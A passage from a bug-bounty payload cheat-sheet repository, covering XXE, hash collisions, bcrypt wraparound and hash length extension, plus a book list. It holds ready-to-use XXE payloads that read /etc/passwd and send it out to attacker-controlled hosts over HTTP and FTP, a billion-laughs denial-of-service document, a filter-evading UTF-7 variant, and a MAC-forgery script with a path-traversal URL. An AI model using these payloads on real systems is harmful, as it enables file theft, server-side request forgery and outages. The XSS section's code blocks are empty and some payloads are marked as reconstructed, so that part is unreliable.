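Half of the list passes `naive_is_local()` while every entry fails `is_local_redirect()`; the remaining safe option is not to accept URLs at all but a token that the server maps to a known path.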
--------------------------------------------------------------------------------
/cheatsheets/xxe.md:
--------------------------------------------------------------------------------

The entity declarations in this copy were lost to tag-stripping (only the `]>&xxe;` tails survived); the payloads below are reconstructed in their standard form, with `file:///etc/passwd` and `example.com` as placeholders for the file and host you actually want.

**LFI Test**

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
```

**Blind LFI test (when first case doesn't return anything)**

A parameter entity reads the file and a second entity carries its content out in the URL of a request to a host you control; check that host's logs.

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;" >]><foo>&blind;</foo>
```

**Access Control bypass (loading restricted resources - PHP example)**

The `php://filter` wrapper base64-encodes the fetched resource so that PHP source or HTML does not break the XML when it is echoed back.

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>
```

**SSRF Test**

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "https://www.example.com/text.txt" >]><foo>&xxe;</foo>
```

**XEE (XML Entity Expansion - DOS)**

Each level expands to ten copies of the previous one, so `&lol9;` expands to a billion `lol`s.

```xml
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
```

**XEE #2 (Remote attack - through external xml inclusion)**

```xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test;</lol></lolz>
```

**XXE FTP HTTP Server**

https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

Out-of-band exfiltration: the document pulls an external DTD from your server, and that DTD defines an entity whose `SYSTEM` URL embeds the file content in an FTP request back to you (FTP rather than HTTP because newlines in the file would otherwise break the URL). The parameter entity names below are reconstructed around the `%remote;`, `%send;` and `%param1;` references that survived.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
```

File stored on http://publicServer.com/parameterEntity_sendftp.dtd

```xml
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
```

**XXE UTF-7**

Re-encoding the payload as UTF-7 gets it past filters that look for `<!ENTITY` or `SYSTEM` in the request body, provided the parser honours the declared encoding.

```
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```

To convert between UTF-8 & UTF-7 use recode.
`recode UTF8..UTF7 payload-file.xml`

--------------------------------------------------------------------------------
/cheatsheets/books.md:
--------------------------------------------------------------------------------

## Books

**Web and browser**
- [Web Hacking 101](https://leanpub.com/web-hacking-101) by Peter Yaworski.
- [Breaking into Information Security: Learning the Ropes 101](https://leanpub.com/ltr101-breaking-into-infosec) by Andy Gill.
- [The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/) by Dafydd Stuttard and Marcus Pinto.
- [Tangled Web](https://www.nostarch.com/tangledweb) by Michal Zalewski.
- [OWASP Testing Guide v4](https://www.owasp.org/images/1/19/OTGv4.pdf) by OWASP Breakers community.

**Mobile**
- [The Mobile Application Hacker's Handbook](https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500) by Dominic Chell et al.
- [iOS Application Security: The Definitive Guide for Hackers and Developers](https://www.nostarch.com/iossecurity) by David Thiel.

**Cryptography**
- [Crypto 101](https://www.crypto101.io/) by Laurens Van Houtven.

**Penetration Testing**
- [The Art of Exploitation by Jon Erickson, 2008](https://www.nostarch.com/hacking2.htm)
- [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://www.nostarch.com/metasploit)
- [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://www.nostarch.com/pentesting)
- [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)
- [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)
- [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)
- [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)
- [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
- [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)
- [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)
- [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)
- [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)
- [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)
- [Bug Hunter's Diary by Tobias Klein, 2011](https://www.nostarch.com/bughunter)
- [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# Bug Bounty Cheat Sheet

| 📚 Reference | 🔎 Vulnerabilities |
|-------------------------------------------------------------|-----------------------------------------------------------|
| [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) | [XSS](cheatsheets/xss.md) |
| [Books](cheatsheets/books.md) | [SQLi](cheatsheets/sqli.md) |
| [Special Tools](cheatsheets/special-tools.md) | [SSRF](cheatsheets/ssrf.md) |
| [Recon](cheatsheets/recon.md) | [CRLF Injection](cheatsheets/crlf.md) |
| [Practice Platforms](cheatsheets/practice-platforms.md) | [CSV Injection](cheatsheets/csv-injection.md) |
| [Bug Bounty Tips](cheatsheets/bugbountytips.md) | [LFI](cheatsheets/lfi.md) |
| | [XXE](cheatsheets/xxe.md) |
| | [RCE](cheatsheets/rce.md) |
| | [Open Redirect](cheatsheets/open-redirect.md) |
| | [Crypto](cheatsheets/crypto.md) |
| | [Template Injection](cheatsheets/template-injection.md) |
| | [Content Injection](cheatsheets/content-injection.md) |
| | [XSLT Injection](cheatsheets/xslt.md) |

# Contributing

We welcome contributions from the public.

### Using the issue tracker 💡

The issue tracker is the preferred channel for bug reports and feature requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)

### Issues and labels 🏷

Our bug tracker utilizes several labels to help organize and identify issues.

### Guidelines for bug reports 🐛

Use the GitHub issue search — check if the issue has already been reported.

# Style Guide

We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not).

- Cheat sheet titles should start with `##`.
- Subheadings should be made bold. (`**Subheading**`)
- Add newlines after subheadings and code blocks.
- Code blocks should use three backticks. (```)
- Make sure to use syntax highlighting whenever possible.
44 | 45 | # Contributors 46 | 47 | - [EdOverflow](https://github.com/EdOverflow) 48 | - [GerbenJavado](https://github.com/GerbenJavado) 49 | - [jon_bottarini](https://github.com/BlueTower) 50 | - [sp1d3r](https://github.com/sp1d3r) 51 | - [yasinS](https://github.com/yasinS) 52 | - [neutrinoguy](https://github.com/neutrinoguy) 53 | - [kuromatae](https://github.com/kuromatae) 54 | - [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors) 55 | -------------------------------------------------------------------------------- /cheatsheets/crypto.md: -------------------------------------------------------------------------------- 1 | ## Crypto 2 | 3 | **MD5 Collision Strings** 4 | 5 | ``` 6 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 7 | ``` 8 | 9 | ``` 10 | %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2 11 | ``` 12 | 13 |

URL decode strings.

```
4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2
```

```
4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2
```

**SHA-1 Collision Strings**

```
%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1
```

```
%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1
```

URL decode strings.
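
Collision strings are only useful if you can confirm they really collide. The following script is an added example, not part of the cheat sheet: it URL-decodes the two MD5 strings and the two SHA-1 strings listed above (copied verbatim from this page), checks that each pair consists of two different messages with an identical digest, and reports which byte offsets differ. The function and variable names are this example's own.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# Percent-encoded collision pairs, copied verbatim from the cheat sheet above.
MD5_PAIR = (
    "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2",
    "%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2",
)
SHA1_PAIR = (
    "%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%73%46%DC%91%66%B6%7E%11%8F%02%9A%B6%21%B2%56%0F%F9%CA%67%CC%A8%C7%F8%5B%A8%4C%79%03%0C%2B%3D%E2%18%F8%6D%B3%A9%09%01%D5%DF%45%C1%4F%26%FE%DF%B3%DC%38%E9%6A%C2%2F%E7%BD%72%8F%0E%45%BC%E0%46%D2%3C%57%0F%EB%14%13%98%BB%55%2E%F5%A0%A8%2B%E3%31%FE%A4%80%37%B8%B5%D7%1F%0E%33%2E%DF%93%AC%35%00%EB%4D%DC%0D%EC%C1%A8%64%79%0C%78%2C%76%21%56%60%DD%30%97%91%D0%6B%D0%AF%3F%98%CD%A4%BC%46%29%B1",
    "%25%50%44%46%2D%31%2E%33%0A%25%E2%E3%CF%D3%0A%0A%0A%31%20%30%20%6F%62%6A%0A%3C%3C%2F%57%69%64%74%68%20%32%20%30%20%52%2F%48%65%69%67%68%74%20%33%20%30%20%52%2F%54%79%70%65%20%34%20%30%20%52%2F%53%75%62%74%79%70%65%20%35%20%30%20%52%2F%46%69%6C%74%65%72%20%36%20%30%20%52%2F%43%6F%6C%6F%72%53%70%61%63%65%20%37%20%30%20%52%2F%4C%65%6E%67%74%68%20%38%20%30%20%52%2F%42%69%74%73%50%65%72%43%6F%6D%70%6F%6E%65%6E%74%20%38%3E%3E%0A%73%74%72%65%61%6D%0A%FF%D8%FF%FE%00%24%53%48%41%2D%31%20%69%73%20%64%65%61%64%21%21%21%21%21%85%2F%EC%09%23%39%75%9C%39%B1%A1%C6%3C%4C%97%E1%FF%FE%01%7F%46%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2%56%0B%45%CA%67%D6%88%C7%F8%4B%8C%4C%79%1F%E0%2B%3D%F6%14%F8%6D%B1%69%09%01%C5%6B%45%C1%53%0A%FE%DF%B7%60%38%E9%72%72%2F%E7%AD%72%8F%0E%49%04%E0%46%C2%30%57%0F%E9%D4%13%98%AB%E1%2E%F5%BC%94%2B%E3%35%42%A4%80%2D%98%B5%D7%0F%2A%33%2E%C3%7F%AC%35%14%E7%4D%DC%0F%2C%C1%A8%74%CD%0C%78%30%5A%21%56%64%61%30%97%89%60%6B%D0%BF%3F%98%CD%A8%04%46%29%A1",
)


def url_decode(encoded: str) -> bytes:
    """The 'URL decode' step from the text: %XX groups become raw bytes."""
    return unquote_to_bytes(encoded)


def to_hex(encoded: str) -> str:
    """Hex rendering of the decoded bytes, as listed under 'URL decode strings'."""
    return url_decode(encoded).hex()


def differing_offsets(a: bytes, b: bytes) -> list:
    """Byte positions at which two equal-length messages differ."""
    if len(a) != len(b):
        raise ValueError("messages differ in length")
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def is_collision(algorithm: str, pair) -> bool:
    """True when the two decoded messages differ but share one digest."""
    a, b = (url_decode(s) for s in pair)
    if a == b:
        return False  # identical input is not a collision
    return hashlib.new(algorithm, a).digest() == hashlib.new(algorithm, b).digest()


def collision_report(algorithm: str, pair) -> dict:
    """Summary a reviewer would want: length, where the bytes differ, shared digest."""
    a, b = (url_decode(s) for s in pair)
    return {
        "algorithm": algorithm,
        "length": len(a),
        "differing_offsets": differing_offsets(a, b),
        "collides": is_collision(algorithm, pair),
        "digest": hashlib.new(algorithm, a).hexdigest(),
    }


if __name__ == "__main__":
    for name, pair in (("md5", MD5_PAIR), ("sha1", SHA1_PAIR)):
        print(collision_report(name, pair))
```

The MD5 pair is a single 64-byte block whose two messages differ in exactly two bytes; the SHA-1 pair is the 320-byte PDF header whose last 128 bytes carry the two near-collision blocks. Both are inputs a defender can drop into a test suite to confirm that a system still accepting MD5 or SHA-1 for integrity is in fact distinguishing neither pair.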

**Bcrypt (BSD) Wraparound Bug**

`$2a$` bcrypt hashes were vulnerable to a wraparound bug where the first string in the list below produces the same hash as each of the strings that follow it.

```
000000000000000000000000000000000000000000000000000000000000000000000000
```

```
012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234
```

```
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345
```

**Length extension attack**

In cryptography and computer security, a length extension attack is a type of attack where an attacker can use `Hash(message1)` and the length of `message1` to calculate `Hash(message1 ∥ message2)` for an attacker-controlled `message2`, without knowing the contents of `message1`.

In summary: given a hash of a string with an unknown prefix, an attacker can append to the string and produce a valid hash for the extended string that still carries the unknown prefix.
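
The construction that makes this possible is `Hash(secret ∥ message)` used as a MAC with a Merkle-Damgård hash such as SHA-1: the digest is the hash's internal state, so anyone holding it can keep compressing. The script below is an added example, not code from the cheat sheet or from hash_extender: a minimal resumable SHA-1, the glue padding (the `%80%00...%A8` bytes seen in the URL example), a forgery against `SHA1(key ∥ message)` that verifies without the key, and the same attempt against HMAC-SHA1, which fails because an HMAC tag is not a resumable state. The key, message and suffix are constructed values; all names are this example's own.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def sha1_padding(total_len):
    """Padding SHA-1 appends to a total_len-byte message: 0x80, zero bytes
    up to 56 mod 64, then the bit length as a big-endian 64-bit integer."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def _compress(state, block):
    """One SHA-1 compression of a 64-byte block (FIPS 180-4)."""
    a, b, c, d, e = state
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK32, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK32 for s, v in zip(state, (a, b, c, d, e)))


def sha1_resume(state, tail, total_len):
    """Finish SHA-1 from a known chaining state. `state` is the state after a
    whole number of blocks, `tail` the bytes that follow, and total_len the
    length in bytes of the entire message including `tail`."""
    data = tail + sha1_padding(total_len)
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return struct.pack(">5I", *state).hex()


def sha1_hex(message):
    """Plain SHA-1 via the same code path, to check it against hashlib."""
    return sha1_resume(SHA1_IV, message, len(message))


def naive_mac(key, message):
    """The weak construction the text describes: SHA1(key || message)."""
    return hashlib.sha1(key + message).hexdigest()


def extend(mac_hex, key_len, message, suffix):
    """From SHA1(key||message) and only len(key), derive message' and mac'
    with message' = message || glue || suffix and mac' = SHA1(key || message')."""
    glue = sha1_padding(key_len + len(message))           # the %80%00...%A8 bytes
    state = struct.unpack(">5I", bytes.fromhex(mac_hex))  # the digest IS the state
    total = key_len + len(message) + len(glue) + len(suffix)
    return message + glue + suffix, sha1_resume(state, suffix, total)


def naive_mac_is_forgeable():
    """The forger never sees KEY, only its length, yet the forged tag verifies."""
    key = b"constructed-secret-key"   # constructed; treated as unknown below
    message = b"file=report.pdf"
    forged_message, forged_mac = extend(naive_mac(key, message), len(key), message, b"&extra=1")
    return naive_mac(key, forged_message) == forged_mac


def hmac_is_forgeable():
    """Same attempt against HMAC-SHA1: the tag is a hash of (key ^ opad || inner
    digest), not the state after key || message, so resuming it yields garbage."""
    key = b"constructed-secret-key"
    message = b"file=report.pdf"
    tag = hmac.new(key, message, hashlib.sha1).hexdigest()
    forged_message, forged_mac = extend(tag, len(key), message, b"&extra=1")
    return hmac.new(key, forged_message, hashlib.sha1).hexdigest() == forged_mac


if __name__ == "__main__":
    print("SHA1(key||msg) forgeable:", naive_mac_is_forgeable())
    print("HMAC-SHA1 forgeable:     ", hmac_is_forgeable())
```

With an 11-byte key and the 10-byte `report.pdf`, `sha1_padding(21)` is 43 bytes ending in `0xA8` (168 bits), which is exactly the glue visible in the page's URL. The defensive lesson is the second function: an HMAC, or any construction where the key enters after the message, removes the shared-state property the forgery relies on, and a server that receives a MAC-protected parameter should use `hmac.compare_digest` on an HMAC tag rather than comparing a bare hash.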

An example:

```
http://example.com/download?file=report.pdf&mac=563162c9c71a17367d44c165b84b85ab59d036f9
```

```
http://example.com/download?file=report.pdf%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A8/../../../../../../../etc/passwd&mac=ee40aa8ec0cfafb7e2ec4de20943b673968857a5
```

A related HackerOne report: https://hackerone.com/reports/251572

Tool to extend a hash: https://github.com/iagox86/hash_extender

More details about the attack:

https://www.whitehatsec.com/blog/hash-length-extension-attacks/
https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

--------------------------------------------------------------------------------
/cheatsheets/xss.md:
--------------------------------------------------------------------------------
## XSS

**Chrome XSS-Auditor Bypass** by [@vivekchsm](https://twitter.com/vivekchsm)

```html
```

**Chrome < v60 beta XSS-Auditor Bypass**

```html
```

**Wordfence XSS Bypasses**

```html
>
"
```

```html
>>
```

**Incapsula WAF Bypasses** by [@i_bo0om](https://twitter.com/i_bo0om)

```html
```